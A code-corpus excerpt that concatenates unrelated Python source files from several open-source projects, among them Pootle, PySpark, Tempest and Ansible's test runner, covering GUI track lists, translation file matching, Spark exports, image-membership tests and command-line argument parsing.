This function creates a line into the sketchboard view corresponding to a video
:param video: the video that the sketch line stands for
:type video: Video class from core module
"""
#Updating the model
self._model.newSketchBoardVideo(video)
#Updating the view
self.update()
def removeTrack(self, track):
"""
This function calls the model and remove the video corresponding to the selected track.
:param track : the track selected in the view
:type track: QListWidgetItem
"""
#Retrieve the widget
widget = self._trackList.itemWidget(track)
video = widget.getVideo()
#Send to the model
self._model.removeSketchBoardVideo(video)
#Updating the view
self.update()
def update(self):
""" Update the view of the list of tracks """
#If the view got no tracks
if len(self._model.getSketchBoardVideos()) == 0:
self._stackedWidget.setCurrentIndex(0)
#If the view already got tracks, just created new ones, and update the others
else :
for video in self._model.getSketchBoardVideos():
if video in self._videoTrackTable.values():
#Updating the data from the model
#Retrieve all the keys corresponding for the value
# for key in self._videoTrackTable.keys():
# #Update them only if there are different from the model data
# if self._videoTrackTable[key] == video:
# if key.getVideo() != video:
# key.update(video)
pass
else :
#Create a new track for this video
widget = Track(video)
item = QtGui.QListWidgetItem()
self._trackList.addItem(item)
self._trackList.setItemWidget(item, widget)
#Reference the new variables
self._videoTrackTable[widget] = video
#Check if a video have been suppressed
for widget, video in self._videoTrackTable.items():
if video not in self._model.getSketchBoardVideos():
#Remove the widget
self._trackList.removeItemWidget(widget)
#Retrieve the QListWidgetItem for this widget and delete it
for item in self._trackList.findItems() :
if self._trackList.itemWidget(item) == widget :
#Retrieve the row of the item
row = self._trackList.row(item)
#Delete the element
listElement = self._trackList.takeItem(row)
del listElement
#Update the reference table
self._videoTrackTable.pop(widget)
self._stackedWidget.setCurrentIndex(1)
# ----------------------- SIGNAL / SLOT ----------------------------------- #
def addVideo(self):
""" Retrieve the currently selected video from the session view to add it directly as a track """
video = self._sessionView.getList().currentItem().data(QtCore.Qt.UserRole)
self.newTrack(video)
def suppressVideo(self):
""" Retrieve the currently selected video from the sktech board view to remove it """
video = self._trackList.selectedItems()[0]
self.removeTrack(video)
# ----------------------- EVENT HANDLERS -------------------------------- #
def dragEnterEvent(self, event):
if event.mimeData().hasFormat("app/video"):
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasFormat("app/video"):
event.accept()
else:
event.ignore()
def dropEvent(self, event):
self.newTrack(event.mimeData().data("app/video"))
event.setDropAction(QtCore.Qt.CopyAction)
event.accept()
|
Finntack/pootle
|
refs/heads/master
|
pootle/apps/pootle_app/project_tree.py
|
1
|
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import errno
import logging
import os
import re
from django.conf import settings
from pootle.core.log import STORE_RESURRECTED, store_log
from pootle.core.utils.timezone import datetime_min
from pootle_app.models.directory import Directory
from pootle_language.models import Language
from pootle_store.models import Store
from pootle_store.util import absolute_real_path, relative_real_path
#: Case insensitive match for language codes
LANGCODE_RE = re.compile('^[a-z]{2,3}([_-][a-z]{2,3})?(@[a-z0-9]+)?$',
re.IGNORECASE)
#: Case insensitive match for language codes as postfix
LANGCODE_POSTFIX_RE = re.compile(
'^.*?[-_.]([a-z]{2,3}([_-][a-z]{2,3})?(@[a-z0-9]+)?)$', re.IGNORECASE)
def direct_language_match_filename(language_code, path_name):
name = os.path.splitext(os.path.basename(path_name))[0]
if name == language_code or name.lower() == language_code.lower():
return True
# Check file doesn't match another language.
if Language.objects.filter(code__iexact=name).count():
return False
detect = LANGCODE_POSTFIX_RE.split(name)
return (len(detect) > 1 and
(detect[1] == language_code or
detect[1].lower() == language_code.lower()))
def match_template_filename(project, filename):
"""Test if :param:`filename` might point at a template file for a given
:param:`project`.
"""
ext = os.path.splitext(os.path.basename(filename))[1][1:]
# FIXME: is the test for matching extension redundant?
if ext in project.filetype_tool.template_extensions:
if ext not in project.filetype_tool.filetype_extensions:
# Template extension is distinct, surely file is a template.
return True
elif not find_lang_postfix(filename):
# File name can't possibly match any language, assume it is a
# template.
return True
return False
def get_matching_language_dirs(project_dir, language):
return [lang_dir for lang_dir in os.listdir(project_dir)
if language.code == lang_dir]
def get_non_existant_language_dir(project_dir, language, file_style,
make_dirs):
if file_style == "gnu":
return project_dir
elif make_dirs:
language_dir = os.path.join(project_dir, language.code)
os.mkdir(language_dir)
return language_dir
else:
raise IndexError("Directory not found for language %s, project %s" %
(language.code, project_dir))
def get_or_make_language_dir(project_dir, language, file_style, make_dirs):
matching_language_dirs = get_matching_language_dirs(project_dir, language)
if len(matching_language_dirs) == 0:
# If no matching directories can be found, check if it is a GNU-style
# project.
return get_non_existant_language_dir(project_dir, language, file_style,
make_dirs)
else:
return os.path.join(project_dir, matching_language_dirs[0])
def get_language_dir(project_dir, language, file_style, make_dirs):
language_dir = os.path.join(project_dir, language.code)
if not os.path.exists(language_dir):
return get_or_make_language_dir(project_dir, language, file_style,
make_dirs)
else:
return language_dir
def get_translation_project_dir(language, project_dir, file_style,
make_dirs=False):
"""Returns the base directory containing translations files for the
project.
:param make_dirs: if ``True``, project and language directories will be
created as necessary.
"""
if file_style == 'gnu':
return project_dir
else:
return get_language_dir(project_dir, language, file_style, make_dirs)
def is_hidden_file(path):
return path[0] == '.'
def split_files_and_dirs(ignored_files, exts, real_dir, file_filter):
files = []
dirs = []
child_paths = [
child_path
for child_path
in os.listdir(real_dir)
if (child_path not in ignored_files
and not is_hidden_file(child_path))]
for child_path in child_paths:
full_child_path = os.path.join(real_dir, child_path)
should_include_file = (
os.path.isfile(full_child_path)
and os.path.splitext(full_child_path)[1][1:] in exts
and file_filter(full_child_path))
if should_include_file:
files.append(child_path)
elif os.path.isdir(full_child_path):
dirs.append(child_path)
return files, dirs
def add_items(fs_items_set, db_items, create_or_resurrect_db_item, parent):
"""Add/make obsolete the database items to correspond to the filesystem.
:param fs_items_set: items (dirs, files) currently in the filesystem
:param db_items: dict (name, item) of items (dirs, stores) currently in the
database
:create_or_resurrect_db_item: callable that will create a new db item
or resurrect an obsolete db item with a given name and parent.
:parent: parent db directory for the items
:return: list of all items, list of newly added items
:rtype: tuple
"""
items = []
new_items = []
db_items_set = set(db_items)
items_to_delete = db_items_set - fs_items_set
items_to_create = fs_items_set - db_items_set
for name in items_to_delete:
db_items[name].makeobsolete()
if len(items_to_delete) > 0:
parent.update_all_cache()
for vfolder_treeitem in parent.vfolder_treeitems:
vfolder_treeitem.update_all_cache()
for name in db_items_set - items_to_delete:
items.append(db_items[name])
for name in items_to_create:
item = create_or_resurrect_db_item(name)
items.append(item)
new_items.append(item)
try:
item.save()
except Exception:
logging.exception('Error while adding %s', item)
return items, new_items
def create_or_resurrect_store(f, parent, name, translation_project):
"""Create or resurrect a store db item with given name and parent."""
try:
store = Store.objects.get(parent=parent, name=name)
store.obsolete = False
store.file_mtime = datetime_min
if store.last_sync_revision is None:
store.last_sync_revision = store.get_max_unit_revision()
store_log(user='system', action=STORE_RESURRECTED,
path=store.pootle_path, store=store.id)
except Store.DoesNotExist:
store = Store.objects.create(
file=f, parent=parent,
name=name, translation_project=translation_project)
store.mark_all_dirty()
return store
def create_or_resurrect_dir(name, parent):
"""Create or resurrect a directory db item with given name and parent."""
try:
directory = Directory.objects.get(parent=parent, name=name)
directory.obsolete = False
except Directory.DoesNotExist:
directory = Directory(name=name, parent=parent)
directory.mark_all_dirty()
return directory
# TODO: rename function or even rewrite it
def add_files(translation_project, ignored_files, exts, relative_dir, db_dir,
file_filter=lambda _x: True):
podir_path = to_podir_path(relative_dir)
files, dirs = split_files_and_dirs(
ignored_files, exts, podir_path, file_filter)
file_set = set(files)
dir_set = set(dirs)
existing_stores = dict((store.name, store) for store in
db_dir.child_stores.live().exclude(file='')
.iterator())
existing_dirs = dict((dir.name, dir) for dir in
db_dir.child_dirs.live().iterator())
files, new_files = add_items(
file_set,
existing_stores,
lambda name: create_or_resurrect_store(
f=os.path.join(relative_dir, name),
parent=db_dir,
name=name,
translation_project=translation_project,
),
db_dir,
)
db_subdirs, new_db_subdirs_ = add_items(
dir_set,
existing_dirs,
lambda name: create_or_resurrect_dir(name=name, parent=db_dir),
db_dir,
)
is_empty = len(files) == 0
for db_subdir in db_subdirs:
fs_subdir = os.path.join(relative_dir, db_subdir.name)
_files, _new_files, _is_empty = add_files(
translation_project,
ignored_files,
exts,
fs_subdir,
db_subdir,
file_filter)
files += _files
new_files += _new_files
is_empty &= _is_empty
if is_empty:
db_dir.makeobsolete()
return files, new_files, is_empty
def to_podir_path(path):
path = relative_real_path(path)
return os.path.join(settings.POOTLE_TRANSLATION_DIRECTORY, path)
def find_lang_postfix(filename):
"""Finds the language code at end of a filename."""
name = os.path.splitext(os.path.basename(filename))[0]
if LANGCODE_RE.match(name):
return name
match = LANGCODE_POSTFIX_RE.match(name)
if match:
return match.groups()[0]
for code in Language.objects.values_list('code', flat=True):
if (name.endswith('-'+code) or name.endswith('_'+code) or
name.endswith('.'+code) or
name.lower().endswith('-'+code.lower()) or
name.endswith('_'+code) or name.endswith('.'+code)):
return code
def translation_project_dir_exists(language, project):
"""Tests if there are translation files corresponding to the given
:param:`language` and :param:`project`.
"""
if project.get_treestyle() == "gnu":
# GNU style projects are tricky
if language.code == 'templates':
# Language is template look for template files
for dirpath_, dirnames, filenames in os.walk(
project.get_real_path()):
for filename in filenames:
if (project.file_belongs_to_project(filename,
match_templates=True)
and match_template_filename(project, filename)):
return True
else:
# find files with the language name in the project dir
for dirpath_, dirnames, filenames in os.walk(
project.get_real_path()):
for filename in filenames:
# FIXME: don't reuse already used file
if (project.file_belongs_to_project(filename,
match_templates=False)
and direct_language_match_filename(language.code,
filename)):
return True
else:
# find directory with the language name in the project dir
try:
dirpath_, dirnames, filename = os.walk(
project.get_real_path()).next()
if language.code in dirnames:
return True
except StopIteration:
pass
return False
def init_store_from_template(translation_project, template_store):
"""Initialize a new file for `translation_project` using `template_store`.
"""
if translation_project.file_style == 'gnu':
target_pootle_path_, target_path = get_translated_name_gnu(
translation_project, template_store)
else:
target_pootle_path_, target_path = get_translated_name(
translation_project, template_store)
# Create the missing directories for the new TP.
target_dir = os.path.dirname(target_path)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
output_file = template_store.file.store
output_file.settargetlanguage(translation_project.language.code)
output_file.savefile(target_path)
def get_translated_name_gnu(translation_project, store):
"""Given a template :param:`store` and a :param:`translation_project` return
target filename.
"""
pootle_path_parts = store.pootle_path.split('/')
pootle_path_parts[1] = translation_project.language.code
pootle_path = '/'.join(pootle_path_parts[:-1])
if not pootle_path.endswith('/'):
pootle_path = pootle_path + '/'
suffix = (
"%s%s%s"
% (translation_project.language.code,
os.extsep,
store.filetype.extension))
# try loading file first
try:
target_store = translation_project.stores.live().get(
parent__pootle_path=pootle_path,
name__iexact=suffix,
)
return (target_store.pootle_path,
target_store.file and target_store.file.path)
except Store.DoesNotExist:
target_store = None
# is this GNU-style with prefix?
use_prefix = (store.parent.child_stores.live().exclude(file="").count() > 1
or translation_project.stores.live().exclude(
name__iexact=suffix, file='').count())
if not use_prefix:
# let's make sure
for tp in translation_project.project.translationproject_set.exclude(
language__code='templates').iterator():
temp_suffix = (
"%s%s%s"
% (tp.language.code,
os.extsep,
store.filetype.template_extension))
if tp.stores.live().exclude(
name__iexact=temp_suffix).exclude(file="").count():
use_prefix = True
break
if use_prefix:
if store.translation_project.language.code == 'templates':
tprefix = os.path.splitext(store.name)[0]
# FIXME: we should detect separator
prefix = tprefix + '-'
else:
prefix = os.path.splitext(store.name)[0][:-len(
store.translation_project.language.code)]
tprefix = prefix[:-1]
try:
target_store = translation_project.stores.live().filter(
parent__pootle_path=pootle_path,
name__in=[
tprefix + '-' + suffix,
tprefix + '_' + suffix,
tprefix + '.' + suffix,
tprefix + '-' + suffix.lower(),
tprefix + '_' + suffix.lower(),
tprefix + '.' + suffix.lower(),
],
)[0]
return (target_store.pootle_path,
target_store.file and target_store.file.path)
except (Store.DoesNotExist, IndexError):
pass
else:
prefix = ""
if store.file:
path_parts = store.file.path.split(os.sep)
name = prefix + suffix
path_parts[-1] = name
pootle_path_parts[-1] = name
else:
path_parts = store.parent.get_real_path().split(os.sep)
path_parts.append(store.name)
return '/'.join(pootle_path_parts), os.sep.join(path_parts)
def get_translated_name(translation_project, store):
name = os.path.splitext(store.name)[0]
if store.file:
path_parts = store.file.name.split(os.sep)
else:
path_parts = store.parent.get_real_path().split(os.sep)
path_parts.append(store.name)
pootle_path_parts = store.pootle_path.split('/')
# Replace language code
path_parts[1] = translation_project.language.code
pootle_path_parts[1] = translation_project.language.code
# Replace extension
path_parts[-1] = (
"%s.%s"
% (name,
store.filetype.extension))
pootle_path_parts[-1] = (
"%s.%s"
% (name,
store.filetype.extension))
return ('/'.join(pootle_path_parts),
absolute_real_path(os.sep.join(path_parts)))
def does_not_exist(path):
if os.path.exists(path):
return False
try:
os.stat(path)
# what the hell?
except OSError as e:
if e.errno == errno.ENOENT:
# explicit no such file or directory
return True
|
pedro2555/acars-api
|
refs/heads/master
|
run.py
|
1
|
#!/usr/bin/env python
"""
Aircraft Communications Addressing and Reporting System API for Flight Simulation
Copyright (C) 2017 Pedro Rodrigues <[email protected]>
This file is part of ACARS API.
ACARS API is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, version 2 of the License.
ACARS API is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ACARS API. If not, see <http://www.gnu.org/licenses/>.
"""
from eve import Eve
import os
from flask_bootstrap import Bootstrap
from eve_docs import eve_docs
app = Eve()
# Heroku support: bind to PORT if defined, otherwise default to 5000.
if 'PORT' in os.environ:
port = int(os.environ.get('PORT'))
host = '0.0.0.0'
debug = False
else:
port = 5000
host = '0.0.0.0'
debug = True
if __name__ == '__main__':
Bootstrap(app)
app.register_blueprint(eve_docs, url_prefix='/docs')
app.run(host=host, port=port, debug=debug)
|
davidchiles/openaddresses
|
refs/heads/master
|
scripts/no/make_out.py
|
45
|
#!/bin/python
import os
import unicodecsv as csv
writer = csv.DictWriter(open('no.csv', 'w'), fieldnames=('X','Y','PUNKT','KOMM','OBJTYPE','GATENR','GATENAVN','HUSNR','BOKST','POSTNR','POSTNAVN','TRANSID'))
writer.writeheader()
for f in os.listdir('./csv'):
print(f)
with open('./csv/{}'.format(f)) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
writer.writerow(row)
|
srbhklkrn/SERVOENGINE
|
refs/heads/master
|
components/script/dom/bindings/codegen/parser/tests/test_any_null.py
|
276
|
def WebIDLTest(parser, harness):
threw = False
try:
parser.parse("""
interface DoubleNull {
attribute any? foo;
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw, "Should have thrown.")
|
ahnqirage/spark
|
refs/heads/master
|
python/pyspark/__init__.py
|
21
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
PySpark is the Python API for Spark.
Public classes:
- :class:`SparkContext`:
Main entry point for Spark functionality.
- :class:`RDD`:
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
- :class:`Broadcast`:
A broadcast variable that gets reused across tasks.
- :class:`Accumulator`:
An "add-only" shared variable that tasks can only add values to.
- :class:`SparkConf`:
For configuring Spark.
- :class:`SparkFiles`:
Access files shipped with jobs.
- :class:`StorageLevel`:
Finer-grained cache persistence levels.
- :class:`TaskContext`:
Information about the current running task, available on the workers and experimental.
- :class:`RDDBarrier`:
Wraps an RDD under a barrier stage for barrier execution.
- :class:`BarrierTaskContext`:
A :class:`TaskContext` that provides extra info and tooling for barrier execution.
- :class:`BarrierTaskInfo`:
Information about a barrier task.
"""
from functools import wraps
import types
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD, RDDBarrier
from pyspark.files import SparkFiles
from pyspark.storagelevel import StorageLevel
from pyspark.accumulators import Accumulator, AccumulatorParam
from pyspark.broadcast import Broadcast
from pyspark.serializers import MarshalSerializer, PickleSerializer
from pyspark.status import *
from pyspark.taskcontext import TaskContext, BarrierTaskContext, BarrierTaskInfo
from pyspark.profiler import Profiler, BasicProfiler
from pyspark.version import __version__
from pyspark._globals import _NoValue
def since(version):
"""
A decorator that annotates a function to append the version of Spark the function was added.
"""
import re
indent_p = re.compile(r'\n( +)')
def deco(f):
indents = indent_p.findall(f.__doc__)
indent = ' ' * (min(len(m) for m in indents) if indents else 0)
f.__doc__ = f.__doc__.rstrip() + "\n\n%s.. versionadded:: %s" % (indent, version)
return f
return deco
def copy_func(f, name=None, sinceversion=None, doc=None):
"""
Returns a function with same code, globals, defaults, closure, and
name (or provide a new name).
"""
# See
# http://stackoverflow.com/questions/6527633/how-can-i-make-a-deepcopy-of-a-function-in-python
fn = types.FunctionType(f.__code__, f.__globals__, name or f.__name__, f.__defaults__,
f.__closure__)
# in case f was given attrs (note this dict is a shallow copy):
fn.__dict__.update(f.__dict__)
if doc is not None:
fn.__doc__ = doc
if sinceversion is not None:
fn = since(sinceversion)(fn)
return fn
def keyword_only(func):
"""
A decorator that forces keyword arguments in the wrapped method
and saves actual input keyword arguments in `_input_kwargs`.
.. note:: Should only be used to wrap a method where first arg is `self`
"""
@wraps(func)
def wrapper(self, *args, **kwargs):
if len(args) > 0:
raise TypeError("Method %s forces keyword arguments." % func.__name__)
self._input_kwargs = kwargs
return func(self, **kwargs)
return wrapper
# for back compatibility
from pyspark.sql import SQLContext, HiveContext, Row
__all__ = [
"SparkConf", "SparkContext", "SparkFiles", "RDD", "StorageLevel", "Broadcast",
"Accumulator", "AccumulatorParam", "MarshalSerializer", "PickleSerializer",
"StatusTracker", "SparkJobInfo", "SparkStageInfo", "Profiler", "BasicProfiler", "TaskContext",
"RDDBarrier", "BarrierTaskContext", "BarrierTaskInfo",
]
|
gutouyu/cs231n
|
refs/heads/master
|
cs231n/assignment/assignment3/cs231n/im2col.py
|
53
|
import numpy as np
def get_im2col_indices(x_shape, field_height, field_width, padding=1, stride=1):
# First figure out what the size of the output should be
N, C, H, W = x_shape
assert (H + 2 * padding - field_height) % stride == 0
assert (W + 2 * padding - field_height) % stride == 0
out_height = (H + 2 * padding - field_height) / stride + 1
out_width = (W + 2 * padding - field_width) / stride + 1
i0 = np.repeat(np.arange(field_height), field_width)
i0 = np.tile(i0, C)
i1 = stride * np.repeat(np.arange(out_height), out_width)
j0 = np.tile(np.arange(field_width), field_height * C)
j1 = stride * np.tile(np.arange(out_width), out_height)
i = i0.reshape(-1, 1) + i1.reshape(1, -1)
j = j0.reshape(-1, 1) + j1.reshape(1, -1)
k = np.repeat(np.arange(C), field_height * field_width).reshape(-1, 1)
return (k, i, j)
def im2col_indices(x, field_height, field_width, padding=1, stride=1):
""" An implementation of im2col based on some fancy indexing """
# Zero-pad the input
p = padding
x_padded = np.pad(x, ((0, 0), (0, 0), (p, p), (p, p)), mode='constant')
k, i, j = get_im2col_indices(x.shape, field_height, field_width, padding,
stride)
cols = x_padded[:, k, i, j]
C = x.shape[1]
cols = cols.transpose(1, 2, 0).reshape(field_height * field_width * C, -1)
return cols
def col2im_indices(cols, x_shape, field_height=3, field_width=3, padding=1,
stride=1):
""" An implementation of col2im based on fancy indexing and np.add.at """
N, C, H, W = x_shape
H_padded, W_padded = H + 2 * padding, W + 2 * padding
x_padded = np.zeros((N, C, H_padded, W_padded), dtype=cols.dtype)
k, i, j = get_im2col_indices(x_shape, field_height, field_width, padding,
stride)
cols_reshaped = cols.reshape(C * field_height * field_width, -1, N)
cols_reshaped = cols_reshaped.transpose(2, 0, 1)
np.add.at(x_padded, (slice(None), k, i, j), cols_reshaped)
if padding == 0:
return x_padded
return x_padded[:, :, padding:-padding, padding:-padding]
pass
|
hpcloud-mon/tempest
|
refs/heads/master
|
tempest/api/image/v1/test_image_members_negative.py
|
4
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from tempest.api.image import base
from tempest import test
class ImageMembersNegativeTest(base.BaseV1ImageMembersTest):
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('147a9536-18e3-45da-91ea-b037a028f364')
def test_add_member_with_non_existing_image(self):
# Add member with non existing image.
non_exist_image = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound, self.client.add_member,
self.alt_tenant_id, non_exist_image)
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('e1559f05-b667-4f1b-a7af-518b52dc0c0f')
def test_delete_member_with_non_existing_image(self):
# Delete member with non existing image.
non_exist_image = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound, self.client.delete_member,
self.alt_tenant_id, non_exist_image)
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('f5720333-dd69-4194-bb76-d2f048addd56')
def test_delete_member_with_non_existing_tenant(self):
# Delete member with non existing tenant.
image_id = self._create_image()
non_exist_tenant = data_utils.rand_uuid_hex()
self.assertRaises(lib_exc.NotFound, self.client.delete_member,
non_exist_tenant, image_id)
@test.attr(type=['negative', 'gate'])
@test.idempotent_id('f25f89e4-0b6c-453b-a853-1f80b9d7ef26')
def test_get_image_without_membership(self):
# Image is hidden from another tenants.
image_id = self._create_image()
self.assertRaises(lib_exc.NotFound,
self.alt_img_cli.get_image,
image_id)
|
tsdmgz/ansible
|
refs/heads/devel
|
test/runner/test.py
|
1
|
#!/usr/bin/env python
# PYTHON_ARGCOMPLETE_OK
"""Test runner for all Ansible tests."""
from __future__ import absolute_import, print_function
import errno
import os
import sys
from lib.util import (
ApplicationError,
display,
raw_command,
find_pip,
get_docker_completion,
)
from lib.delegation import (
delegate,
)
from lib.executor import (
command_posix_integration,
command_network_integration,
command_windows_integration,
command_units,
command_compile,
command_shell,
SUPPORTED_PYTHON_VERSIONS,
COMPILE_PYTHON_VERSIONS,
ApplicationWarning,
Delegate,
generate_pip_install,
check_startup,
)
from lib.config import (
IntegrationConfig,
PosixIntegrationConfig,
WindowsIntegrationConfig,
NetworkIntegrationConfig,
SanityConfig,
UnitsConfig,
CompileConfig,
ShellConfig,
)
from lib.sanity import (
command_sanity,
sanity_init,
sanity_get_tests,
)
from lib.target import (
find_target_completion,
walk_posix_integration_targets,
walk_network_integration_targets,
walk_windows_integration_targets,
walk_units_targets,
walk_compile_targets,
walk_sanity_targets,
)
from lib.core_ci import (
AWS_ENDPOINTS,
)
from lib.cloud import (
initialize_cloud_plugins,
)
import lib.cover
def main():
"""Main program function."""
try:
git_root = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))
os.chdir(git_root)
initialize_cloud_plugins()
sanity_init()
args = parse_args()
config = args.config(args)
display.verbosity = config.verbosity
display.color = config.color
display.info_stderr = (isinstance(config, SanityConfig) and config.lint) or (isinstance(config, IntegrationConfig) and config.list_targets)
check_startup()
try:
args.func(config)
except Delegate as ex:
delegate(config, ex.exclude, ex.require)
display.review_warnings()
except ApplicationWarning as ex:
display.warning(str(ex))
exit(0)
except ApplicationError as ex:
display.error(str(ex))
exit(1)
except KeyboardInterrupt:
exit(2)
except IOError as ex:
if ex.errno == errno.EPIPE:
exit(3)
raise
def parse_args():
"""Parse command line arguments."""
try:
import argparse
except ImportError:
if '--requirements' not in sys.argv:
raise
raw_command(generate_pip_install(find_pip(), 'ansible-test'))
import argparse
try:
import argcomplete
except ImportError:
argcomplete = None
if argcomplete:
epilog = 'Tab completion available using the "argcomplete" python package.'
else:
epilog = 'Install the "argcomplete" python package to enable tab completion.'
parser = argparse.ArgumentParser(epilog=epilog)
common = argparse.ArgumentParser(add_help=False)
common.add_argument('-e', '--explain',
action='store_true',
help='explain commands that would be executed')
common.add_argument('-v', '--verbose',
dest='verbosity',
action='count',
default=0,
help='display more output')
common.add_argument('--color',
metavar='COLOR',
nargs='?',
help='generate color output: %(choices)s',
choices=('yes', 'no', 'auto'),
const='yes',
default='auto')
common.add_argument('--debug',
action='store_true',
help='run ansible commands in debug mode')
test = argparse.ArgumentParser(add_help=False, parents=[common])
test.add_argument('include',
metavar='TARGET',
nargs='*',
help='test the specified target').completer = complete_target
test.add_argument('--exclude',
metavar='TARGET',
action='append',
help='exclude the specified target').completer = complete_target
test.add_argument('--require',
metavar='TARGET',
action='append',
help='require the specified target').completer = complete_target
test.add_argument('--coverage',
action='store_true',
help='analyze code coverage when running tests')
test.add_argument('--coverage-label',
default='',
help='label to include in coverage output file names')
test.add_argument('--metadata',
help=argparse.SUPPRESS)
add_changes(test, argparse)
add_environments(test)
integration = argparse.ArgumentParser(add_help=False, parents=[test])
integration.add_argument('--python',
metavar='VERSION',
choices=SUPPORTED_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
integration.add_argument('--start-at',
metavar='TARGET',
help='start at the specified target').completer = complete_target
integration.add_argument('--start-at-task',
metavar='TASK',
help='start at the specified task')
integration.add_argument('--tags',
metavar='TAGS',
help='only run plays and tasks tagged with these values')
integration.add_argument('--skip-tags',
metavar='TAGS',
help='only run plays and tasks whose tags do not match these values')
integration.add_argument('--diff',
action='store_true',
help='show diff output')
integration.add_argument('--allow-destructive',
action='store_true',
help='allow destructive tests (--local and --tox only)')
integration.add_argument('--retry-on-error',
action='store_true',
help='retry failed test with increased verbosity')
integration.add_argument('--continue-on-error',
action='store_true',
help='continue after failed test')
integration.add_argument('--debug-strategy',
action='store_true',
help='run test playbooks using the debug strategy')
integration.add_argument('--changed-all-target',
metavar='TARGET',
default='all',
help='target to run when all tests are needed')
integration.add_argument('--list-targets',
action='store_true',
help='list matching targets instead of running tests')
subparsers = parser.add_subparsers(metavar='COMMAND')
subparsers.required = True # work-around for python 3 bug which makes subparsers optional
posix_integration = subparsers.add_parser('integration',
parents=[integration],
help='posix integration tests')
posix_integration.set_defaults(func=command_posix_integration,
targets=walk_posix_integration_targets,
config=PosixIntegrationConfig)
add_extra_docker_options(posix_integration)
network_integration = subparsers.add_parser('network-integration',
parents=[integration],
help='network integration tests')
network_integration.set_defaults(func=command_network_integration,
targets=walk_network_integration_targets,
config=NetworkIntegrationConfig)
add_extra_docker_options(network_integration, integration=False)
network_integration.add_argument('--platform',
metavar='PLATFORM',
action='append',
help='network platform/version').completer = complete_network_platform
network_integration.add_argument('--inventory',
metavar='PATH',
help='path to inventory used for tests')
windows_integration = subparsers.add_parser('windows-integration',
parents=[integration],
help='windows integration tests')
windows_integration.set_defaults(func=command_windows_integration,
targets=walk_windows_integration_targets,
config=WindowsIntegrationConfig)
add_extra_docker_options(windows_integration, integration=False)
windows_integration.add_argument('--windows',
metavar='VERSION',
action='append',
help='windows version').completer = complete_windows
units = subparsers.add_parser('units',
parents=[test],
help='unit tests')
units.set_defaults(func=command_units,
targets=walk_units_targets,
config=UnitsConfig)
units.add_argument('--python',
metavar='VERSION',
choices=SUPPORTED_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
units.add_argument('--collect-only',
action='store_true',
help='collect tests but do not execute them')
add_extra_docker_options(units, integration=False)
compiler = subparsers.add_parser('compile',
parents=[test],
help='compile tests')
compiler.set_defaults(func=command_compile,
targets=walk_compile_targets,
config=CompileConfig)
compiler.add_argument('--python',
metavar='VERSION',
choices=COMPILE_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(COMPILE_PYTHON_VERSIONS))
add_lint(compiler)
add_extra_docker_options(compiler, integration=False)
sanity = subparsers.add_parser('sanity',
parents=[test],
help='sanity tests')
sanity.set_defaults(func=command_sanity,
targets=walk_sanity_targets,
config=SanityConfig)
sanity.add_argument('--test',
metavar='TEST',
action='append',
choices=[test.name for test in sanity_get_tests()],
help='tests to run').completer = complete_sanity_test
sanity.add_argument('--skip-test',
metavar='TEST',
action='append',
choices=[test.name for test in sanity_get_tests()],
help='tests to skip').completer = complete_sanity_test
sanity.add_argument('--list-tests',
action='store_true',
help='list available tests')
sanity.add_argument('--python',
metavar='VERSION',
choices=SUPPORTED_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
sanity.add_argument('--base-branch',
help=argparse.SUPPRESS)
add_lint(sanity)
add_extra_docker_options(sanity, integration=False)
shell = subparsers.add_parser('shell',
parents=[common],
help='open an interactive shell')
shell.set_defaults(func=command_shell,
config=ShellConfig)
add_environments(shell, tox_version=True)
add_extra_docker_options(shell)
coverage_common = argparse.ArgumentParser(add_help=False, parents=[common])
add_environments(coverage_common, tox_version=True, tox_only=True)
coverage = subparsers.add_parser('coverage',
help='code coverage management and reporting')
coverage_subparsers = coverage.add_subparsers(metavar='COMMAND')
coverage_subparsers.required = True # work-around for python 3 bug which makes subparsers optional
coverage_combine = coverage_subparsers.add_parser('combine',
parents=[coverage_common],
help='combine coverage data and rewrite remote paths')
coverage_combine.set_defaults(func=lib.cover.command_coverage_combine,
